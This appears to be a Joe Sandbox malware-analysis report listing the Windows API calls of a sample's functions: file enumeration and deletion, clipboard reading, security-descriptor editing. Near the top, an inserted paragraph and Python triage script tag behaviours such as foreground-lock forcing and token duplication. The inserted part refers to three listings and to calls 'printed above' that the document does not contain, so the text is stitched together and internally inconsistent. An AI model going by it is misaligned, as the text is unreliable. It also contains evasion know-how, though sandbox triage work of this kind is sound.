                                                                                                                                                                                                                                                      • Opcode ID: 7c17b2a4dc4896ce42c09d096990f1b3ddf30ec20301958a2e5330b6411fc21b
                                                                                                                                                                                                                                                      • Instruction ID: 96ced0edc631024a046258bf8ff0769eb189e4a153ad4ebba6fe9dca6bcd74f6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7c17b2a4dc4896ce42c09d096990f1b3ddf30ec20301958a2e5330b6411fc21b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29818DB190020DAFDF119FA4CC45AFE7BB9EF14308F085129FA18BA161D7318E95DB22
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00F06EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F05FA6,?), ref: 00F06ED8
                                                                                                                                                                                                                                                        • Part of subcall function 00F06EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F05FA6,?), ref: 00F06EF1
                                                                                                                                                                                                                                                        • Part of subcall function 00F0725E: __wsplitpath.LIBCMT ref: 00F0727B
                                                                                                                                                                                                                                                        • Part of subcall function 00F0725E: __wsplitpath.LIBCMT ref: 00F0728E
                                                                                                                                                                                                                                                        • Part of subcall function 00F072CB: GetFileAttributesW.KERNEL32(?,00F06019), ref: 00F072CC
                                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00F06149
                                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00F06167
                                                                                                                                                                                                                                                      • __wsplitpath.LIBCMT ref: 00F0618E
                                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00F061A4
                                                                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 00F06209
                                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00F0621C
                                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00F0622F
                                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00F0625D
                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 00F0626E
                                                                                                                                                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 00F06289
                                                                                                                                                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 00F06298
                                                                                                                                                                                                                                                      • CopyFileW.KERNEL32(?,?,00000000), ref: 00F062AD
                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 00F062BE
                                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F062E1
                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00F062FD
                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00F0630B
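The three API listings above are raw call sequences; what triage needs from them is the behaviour each sequence implies. The Python below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses listings in exactly this format (the bullet, the optional "Part of subcall function" prefix, the API.MODULE(args) body and the ", ref: address" tail) into call records and matches each record against three rule sets. The rule sets and their labels are the editor's heuristics, not Joe Sandbox signatures, and the constructed input is a subset of the calls printed in the three records above. Virtual-key 0x12 is VK_MENU (Alt): the AttachThreadInput plus synthetic Alt tap before SetForegroundWindow is the usual way to get around the foreground-lock rules, and AdjustTokenPrivileges followed by DuplicateTokenEx, OpenWindowStationW("winsta0") and OpenDesktopW("default") is the preparation for starting a process under another token or on another desktop.

```python
"""Parse Joe Sandbox 'APIs' listings into call records and tag behaviours.
Added example; the rule sets below are editor assumptions, not Joe Sandbox signatures."""
import re
from collections import Counter
from typing import Dict, FrozenSet, List, NamedTuple, Optional, Tuple

# Constructed input: a subset of the calls from the three records above.
SAMPLE = """APIs
• GetForegroundWindow.USER32(00000000,00000000), ref: 00EDEB4A
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F33AEA
• IsIconic.USER32(000000FF), ref: 00F33AF3
• ShowWindow.USER32(000000FF,00000009), ref: 00F33B00
• SetForegroundWindow.USER32(000000FF), ref: 00F33B0A
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F33B20
• GetCurrentThreadId.KERNEL32 ref: 00F33B27
• AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00F33B44
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00F33B6C
• keybd_event.USER32(00000012,00000000), ref: 00F33B77
• keybd_event.USER32(00000012,00000000), ref: 00F33B86
• SetForegroundWindow.USER32(000000FF), ref: 00F33BA6
• AttachThreadInput.USER32(000000FF,?,00000000), ref: 00F33BCD
APIs
  • Part of subcall function 00EFB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EFB180
  • Part of subcall function 00EFB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00EFB1AD
• _memset.LIBCMT ref: 00EFAD08
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00EFAD5A
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00EFAD82
• SetProcessWindowStation.USER32(00000000), ref: 00EFADA5
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00EFADBF
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00F061A4
• lstrcmpiW.KERNEL32(?,?), ref: 00F0625D
• DeleteFileW.KERNEL32(?), ref: 00F0626E
• MoveFileW.KERNEL32(?,?), ref: 00F06289
• CopyFileW.KERNEL32(?,?,00000000), ref: 00F062AD
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00F062E1
• FindClose.KERNEL32(00000000), ref: 00F062FD
"""

VK_MENU = 0x12  # Alt; the key tapped via keybd_event in the first record


class Call(NamedTuple):
    api: str
    module: str
    args: Tuple[str, ...]
    ref: int                    # address of the call site
    subcall_of: Optional[int]   # callee address when the report marks it "Part of subcall function"


CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


def parse_listings(text: str) -> List[List[Call]]:
    """Each 'APIs' header opens a new record; metadata lines between records are skipped."""
    blocks: List[List[Call]] = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            blocks.append([])
            continue
        m = CALL_RE.match(line)
        if not m or not blocks:
            continue
        args = tuple(a for a in (m["args"] or "").split(",") if a)
        sub = int(m["sub"], 16) if m["sub"] else None
        blocks[-1].append(Call(m["api"], m["mod"], args, int(m["ref"], 16), sub))
    return blocks


# Editor-defined heuristics (assumption): a record gets a label when it calls every API in the set.
RULES: Dict[str, FrozenSet[str]] = {
    "foreground_forcing": frozenset({"AttachThreadInput", "SetForegroundWindow", "keybd_event"}),
    "token_desktop_switch": frozenset({"AdjustTokenPrivileges", "DuplicateTokenEx",
                                       "OpenWindowStationW", "OpenDesktopW"}),
    "file_relocate_loop": frozenset({"FindFirstFileW", "FindNextFileW", "MoveFileW", "DeleteFileW"}),
}


def tag_behaviours(calls: List[Call], include_subcalls: bool = True) -> List[str]:
    """Labels whose required API set is fully present; subcall entries count only if requested."""
    names = {c.api for c in calls if include_subcalls or c.subcall_of is None}
    return [label for label, needed in RULES.items() if needed <= names]


def synthetic_keys(calls: List[Call]) -> List[int]:
    """Virtual-key codes pushed through keybd_event (its first argument)."""
    return [int(c.args[0], 16) for c in calls if c.api == "keybd_event" and c.args]


def summarize(calls: List[Call]) -> dict:
    """Per-record triage summary: call count, imported modules, code span, behaviour tags."""
    direct = [c.ref for c in calls if c.subcall_of is None]
    return {
        "calls": len(calls),
        "modules": dict(Counter(c.module for c in calls)),
        "span": (min(direct), max(direct)),
        "behaviours": tag_behaviours(calls),
        "alt_presses": synthetic_keys(calls).count(VK_MENU),
    }


if __name__ == "__main__":
    for i, record in enumerate(parse_listings(SAMPLE), 1):
        print(i, summarize(record))
```

Subcall entries are attributed to the callee address the report names, so `tag_behaviours(record, include_subcalls=False)` restricts matching to calls the function issues itself; on the second record the token rule then no longer fires, because AdjustTokenPrivileges is only reached through the helper at 00EFB134. The code span is computed over direct calls only for the same reason.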
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                                                                                                                                                                                                      • String ID: \*.*
                                                                                                                                                                                                                                                      • API String ID: 1917200108-1173974218
                                                                                                                                                                                                                                                      • Opcode ID: 8736b6b4bbcb60bab92b16220f6d92d361baee4411a5e9f055851d0fa4be254e
                                                                                                                                                                                                                                                      • Instruction ID: 070060805603388c8a34ce934e4fa38c3cc6f647a79dae883227b061dda1580b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8736b6b4bbcb60bab92b16220f6d92d361baee4411a5e9f055851d0fa4be254e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E1513072D0811CAACF21EB91CC44EEBB7FCAF15310F0501EAE545E2141EE769789AFA4
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • OpenClipboard.USER32(00F5DC00), ref: 00F16B36
                                                                                                                                                                                                                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 00F16B44
                                                                                                                                                                                                                                                      • GetClipboardData.USER32(0000000D), ref: 00F16B4C
                                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 00F16B58
                                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00F16B74
                                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 00F16B7E
                                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00F16B93
                                                                                                                                                                                                                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 00F16BA0
                                                                                                                                                                                                                                                      • GetClipboardData.USER32(00000001), ref: 00F16BA8
                                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00F16BB5
                                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00F16BE9
                                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 00F16CF6
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3222323430-0
                                                                                                                                                                                                                                                      • Opcode ID: 3d614b07d2ba8b18f7864afeae3237292ef58df5a501208cfd09bb586fd09d28
                                                                                                                                                                                                                                                      • Instruction ID: b8ff8ef1806dfcdb7b5df24fae66c8d7d850dbdab3d2f4b6980d1751f91d5b89
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d614b07d2ba8b18f7864afeae3237292ef58df5a501208cfd09bb586fd09d28
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3051E135204205ABD300EF64DD46FAE77A8EFA5B11F01002DFA5AE31E1DF70D946AB62
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00F0F62B
                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00F0F67F
                                                                                                                                                                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F0F6A4
                                                                                                                                                                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F0F6BB
                                                                                                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F0F6E2
                                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00F0F72E
                                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00F0F767
                                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00F0F7BB
                                                                                                                                                                                                                                                        • Part of subcall function 00EE172B: __woutput_l.LIBCMT ref: 00EE1784
                                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00F0F809
                                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00F0F858
                                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00F0F8A7
                                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00F0F8F6
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                                                                                                                                                                                                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                                                                                                                                                      • API String ID: 835046349-2428617273
                                                                                                                                                                                                                                                      • Opcode ID: e0ef98098b8e998aceec52b5b2edebcf0ce3e64617696349d6add287567188e8
                                                                                                                                                                                                                                                      • Instruction ID: 148297dc7552f4e0e7d2ccb473a7e0399643e01781a59c4ce1addefacfa597df
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e0ef98098b8e998aceec52b5b2edebcf0ce3e64617696349d6add287567188e8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BAA12FB2408344ABC310EB95CD85EAFB7ECFF99700F44182EF58592292EB35D949D762
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00F11B50
                                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00F11B65
                                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00F11B7C
                                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00F11B8E
                                                                                                                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00F11BA8
                                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00F11BC0
                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00F11BCB
                                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00F11BE7
                                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00F11C0E
                                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00F11C25
                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00F11C37
                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(00F739FC), ref: 00F11C55
                                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F11C5F
                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00F11C6C
                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00F11C7C
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
• String ID: *.*
• API String ID: 1803514871-438819550
• Opcode ID: 2f149f71133b664a3a5052738d7730d947a4ba85b7563b0ebf26631455d1ab03
• Instruction ID: db56147707081626f5c8283569a10bc80b241f8c4a05e6d2bdc310d47361cee1
• Opcode Fuzzy Hash: 2f149f71133b664a3a5052738d7730d947a4ba85b7563b0ebf26631455d1ab03
• Instruction Fuzzy Hash: 9C31B636A0521D6BDF10DFA0DC49ADE77ACAF46320F104196EE15E2090EB70DAC5AA64
APIs
• FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00F11CAB
• _wcscmp.LIBCMT ref: 00F11CC0
• _wcscmp.LIBCMT ref: 00F11CD7
  • Part of subcall function 00F06BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00F06BEF
• FindNextFileW.KERNEL32(00000000,?), ref: 00F11D06
• FindClose.KERNEL32(00000000), ref: 00F11D11
• FindFirstFileW.KERNEL32(*.*,?), ref: 00F11D2D
• _wcscmp.LIBCMT ref: 00F11D54
• _wcscmp.LIBCMT ref: 00F11D6B
• SetCurrentDirectoryW.KERNEL32(?), ref: 00F11D7D
• SetCurrentDirectoryW.KERNEL32(00F739FC), ref: 00F11D9B
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00F11DA5
• FindClose.KERNEL32(00000000), ref: 00F11DB2
• FindClose.KERNEL32(00000000), ref: 00F11DC2
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
• String ID: *.*
• API String ID: 1824444939-438819550
• Opcode ID: 2e2f2b3a35221a265331da7f041ad41899782cfeb0f0568b7fca9e4a70da158d
• Instruction ID: 96e19c0078f6c75050cebf528611ef59faa989de43a798c7b66015c0c34039c2
• Opcode Fuzzy Hash: 2e2f2b3a35221a265331da7f041ad41899782cfeb0f0568b7fca9e4a70da158d
• Instruction Fuzzy Hash: 6131063290061E7ADF20EFA0EC09ADE77ADAF46334F104595EE01A3090DB70DAC5EA65
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: _memset
• String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
• API String ID: 2102423945-2023335898
• Opcode ID: b96144db89b437c17a6030daa4fa45b745c235430099c5bc21b9953885e60f6a
• Instruction ID: 696de0d80ded7e5cd42c159e2a533f823d9d322c54185d31ac4202d5aa7d4dd4
• Opcode Fuzzy Hash: b96144db89b437c17a6030daa4fa45b745c235430099c5bc21b9953885e60f6a
• Instruction Fuzzy Hash: CE82BE71D04219CBCB24CF98CA80BEDBBB1BF44324F24916AD859BB341E7759D86DB90
APIs
• GetLocalTime.KERNEL32(?), ref: 00F109DF
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00F109EF
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00F109FB
• __wsplitpath.LIBCMT ref: 00F10A59
• _wcscat.LIBCMT ref: 00F10A71
• _wcscat.LIBCMT ref: 00F10A83
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F10A98
• SetCurrentDirectoryW.KERNEL32(?), ref: 00F10AAC
• SetCurrentDirectoryW.KERNEL32(?), ref: 00F10ADE
• SetCurrentDirectoryW.KERNEL32(?), ref: 00F10AFF
• _wcscpy.LIBCMT ref: 00F10B0B
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00F10B4A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
• String ID: *.*
• API String ID: 3566783562-438819550
• Opcode ID: 0d707e15511cc1db2bc844cc33edf3e0be190c1ef4e3a34617ee1d71512ca476
• Instruction ID: d254494978f188f786b7bf073edf36b33b692b721a9041af541aeb524ff8cb04
• Opcode Fuzzy Hash: 0d707e15511cc1db2bc844cc33edf3e0be190c1ef4e3a34617ee1d71512ca476
• Instruction Fuzzy Hash: 2B6147725083059FC710EF60C844EAEB3E8FF89314F04492EE989D7252DB75E985DB92
APIs
  • Part of subcall function 00EFABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00EFABD7
  • Part of subcall function 00EFABBB: GetLastError.KERNEL32(?,00EFA69F,?,?,?), ref: 00EFABE1
  • Part of subcall function 00EFABBB: GetProcessHeap.KERNEL32(00000008,?,?,00EFA69F,?,?,?), ref: 00EFABF0
  • Part of subcall function 00EFABBB: HeapAlloc.KERNEL32(00000000,?,00EFA69F,?,?,?), ref: 00EFABF7
  • Part of subcall function 00EFABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00EFAC0E
  • Part of subcall function 00EFAC56: GetProcessHeap.KERNEL32(00000008,00EFA6B5,00000000,00000000,?,00EFA6B5,?), ref: 00EFAC62
  • Part of subcall function 00EFAC56: HeapAlloc.KERNEL32(00000000,?,00EFA6B5,?), ref: 00EFAC69
  • Part of subcall function 00EFAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00EFA6B5,?), ref: 00EFAC7A
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00EFA6D0
• _memset.LIBCMT ref: 00EFA6E5
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00EFA704
• GetLengthSid.ADVAPI32(?), ref: 00EFA715
• GetAce.ADVAPI32(?,00000000,?), ref: 00EFA752
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00EFA76E
                                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00EFA78B
                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00EFA79A
                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00EFA7A1
                                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00EFA7C2
                                                                                                                                                                                                                                                      • CopySid.ADVAPI32(00000000), ref: 00EFA7C9
                                                                                                                                                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00EFA7FA
                                                                                                                                                                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00EFA820
                                                                                                                                                                                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00EFA834
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3996160137-0
                                                                                                                                                                                                                                                      • Opcode ID: e57a94a0860a5455c54d4b43bd471b6766b6a8d17e67f7faf83f9df1553fbf7d
                                                                                                                                                                                                                                                      • Instruction ID: d81efb71e379491ce57c3ac22d718058f9f30d50f855287d3f570698a27f8f8e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e57a94a0860a5455c54d4b43bd471b6766b6a8d17e67f7faf83f9df1553fbf7d
